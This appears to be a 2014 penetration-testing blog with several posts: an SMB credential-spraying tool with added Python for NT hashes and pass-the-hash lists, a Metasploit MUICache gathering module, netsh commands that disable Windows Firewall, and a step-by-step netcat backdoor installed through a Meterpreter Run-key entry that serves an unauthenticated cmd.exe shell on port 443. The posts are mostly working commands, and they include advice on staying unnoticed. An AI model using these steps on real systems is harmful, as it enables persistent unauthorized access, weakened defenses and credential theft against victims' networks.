Saturday, 12 July 2014

keimpx – SMB Credential Scanner


keimpx is an open source tool, released under a modified version of Apache License 1.1. It can be used to quickly check the usefulness of credentials across a network over SMB. Credentials can be:

  1. Combination of user / plain-text password.
  2. Combination of user / NTLM hash.
  3. Combination of user / NTLM logon session token.

If any valid credentials have been discovered across the network after its attack phase, the user is asked to choose which host to connect to and which valid credentials to use, and is then dropped into an interactive SMB shell where the user can:

  1. Spawn an interactive command prompt.
  2. Navigate through the remote SMB shares: list, upload, download, create and remove files, etc.
  3. Deploy and undeploy their own service, for instance a backdoor listening on a TCP port for incoming connections.
  4. List user details, domains and the password policy.

Every attempt the tool makes is a real SMB logon, so failed guesses count toward the domain's account lockout threshold; check the lockout policy before testing a long credential list against many accounts.
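The credential forms above map onto what the tool consumes: a plain-text password, or an LM:NT hash pair, where on modern Windows the LM half is usually the fixed "empty LM" constant. The Python below is an added example written for this page, not code from keimpx: it derives the NT hash used for pass-the-hash from a plaintext password (MD4 over the UTF-16LE encoding, implemented inline because OpenSSL 3 builds of hashlib often lack MD4), then normalises a mixed credential list into (user, password or hash pair) records and validates the hash fields. The colon-separated user:password / user:LMHASH:NTHASH line layout is the common pwdump-style convention and is an assumption about the input file here, not keimpx's documented format; the sample lines are constructed.

```python
import re
import struct

# LM hash of an empty password: what Windows stores when LM hashing is disabled.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (hashlib's md4 is often unavailable)."""
    mask = 0xFFFFFFFF

    def rot(x, n):
        return ((x << n) | (x >> (32 - n))) & mask

    def f(x, y, z):
        return (x & y) | (~x & z)

    def g(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def h(x, y, z):
        return x ^ y ^ z

    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)            # bit length, little-endian
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):                             # round 1
            a = rot((a + f(b, c, d) + x[i]) & mask, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                             # round 2
            k = (i % 4) * 4 + i // 4
            a = rot((a + g(b, c, d) + x[k] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
        for i in range(16):                             # round 3
            a = rot((a + h(b, c, d) + x[order[i]] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        state = [(s + v) & mask for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), as lower-case hex."""
    return md4(password.encode("utf-16-le")).hex()


def parse_credential_line(line: str) -> dict:
    """Normalise one credential line (assumed pwdump-style layout) into a record.

    user:password         plain-text credential (password must not contain ':')
    user:LMHASH:NTHASH    pass-the-hash credential
    user::NTHASH          NT-only hash; the LM half is filled with EMPTY_LM
    """
    parts = line.rstrip("\r\n").split(":")
    if len(parts) == 2:
        user, password = parts
        return {"user": user, "kind": "password", "password": password,
                "lm": EMPTY_LM, "nt": nt_hash(password),
                "empty_password": password == ""}
    if len(parts) == 3:
        user, lm, nt = parts
        lm = (lm or EMPTY_LM).lower()
        nt = nt.lower()
        if not (HEX32.match(lm) and HEX32.match(nt)):
            raise ValueError("hash fields must be 32 hex characters: %r" % line)
        return {"user": user, "kind": "hash", "lm": lm, "nt": nt,
                "empty_password": nt == nt_hash("")}   # NT hash of "" is well known
    raise ValueError("unrecognised credential line: %r" % line)


def load_credentials(text: str) -> list:
    """Parse a whole credential file, skipping blank lines and # comments."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        records.append(parse_credential_line(line))
    return records


# Constructed sample input for this example; not credentials from a real host.
SAMPLE = """\
# plaintext and hashed entries mixed in one file
administrator:password
svc_backup::8846f7eaee8fb117ad06bdd830b7586c
jdoe:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
"""

if __name__ == "__main__":
    for rec in load_credentials(SAMPLE):
        flag = " (empty password)" if rec["empty_password"] else ""
        print(rec["user"], rec["kind"], rec["lm"] + ":" + rec["nt"] + flag)
```

The empty-password check matters in practice: an account whose NT hash is the hash of "" authenticates with no password at all, and a spray tool will log it as a valid credential just like any other.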



Friday, 11 July 2014

How to get MUICache Entries in Remote Windows Machine


According to Nirsoft.net, “each time that you start using a new application, Windows operating system automatically extracts the application name from the version resource of the exe file, and stores it for using it later, in Registry key known as the ‘MuiCache’.” The key is therefore a record of which programs a user has launched, and it survives after the executables themselves have been deleted.

enum_muicache is a post-exploitation module: it runs through a Meterpreter session you already have, so it takes a SESSION option rather than a payload and LHOST.

use post/windows/gather/enum_muicache

msf post(enum_muicache) > set SESSION 2 (ID of the Meterpreter session, as shown by sessions -l)

msf post(enum_muicache) > run


How to Disable Windows Firewall using Metasploit



Windows Firewall filters inbound connections to the host, so a listener such as a bind shell or the netcat backdoor from the next post is unreachable on a compromised machine until the firewall is turned off or the port is opened. In Windows 7 it is profile-aware: protection and notifications can be tuned separately for the Home, Work and Public network profiles, so a machine on a public network (a library or a coffee shop) can block all incoming connections while the same setting would be overkill at home or at work.

From a Meterpreter session with administrative rights, drop to a Windows command prompt (the shell command) and run:

Command :

netsh firewall set opmode disable

The netsh firewall context is the legacy XP-era interface and is deprecated from Windows 7 onward, where the advfirewall context does the same job (netsh advfirewall set allprofiles state off); both need an elevated shell. Switching the firewall off is visible to the user through an Action Center notification, so opening only the one port the backdoor needs is the quieter option.

Thursday, 10 July 2014

How to Install Netcat Backdoor on a Remote Machine Using Metasploit


When an attacker successfully compromises a system, they need a way back in, so the usual move is to install a backdoor on the victim computer: something that survives a reboot and lets the attacker reconnect later to use the machine's resources and collect data from it. The walkthrough below does this with netcat from an existing Meterpreter session.

1 - Upload netcat to the remote system (the path below is where Kali and BackTrack ship the Windows binaries).
Command :
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

2 - List the existing values under the Run key before touching it, so the new value does not overwrite a legitimate entry. Writing under HKLM needs administrative rights; an unprivileged session can use the same key under HKCU instead, which then only fires when that user logs on.
Command :
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

3 - Add netcat to the start-up entries. -L makes nc.exe listen again after each client disconnects, -d detaches it from the console, -p 443 is the listening port, and -e cmd.exe hands a command prompt to whoever connects, with no authentication at all.
Command :
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'

4 - Verify that the backdoor is now among the autorun entries.
Command :
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc

The Run value only fires at the next logon (the listener can be started right away with Meterpreter's execute command), and inbound TCP 443 has to be allowed through Windows Firewall, either by disabling it as in the previous post or by opening that single port. Because -e cmd.exe serves an unauthenticated shell, in the context of whichever user logs on, to anyone who reaches the port, treat this as a demonstration of persistence rather than something to leave running on a client's network.
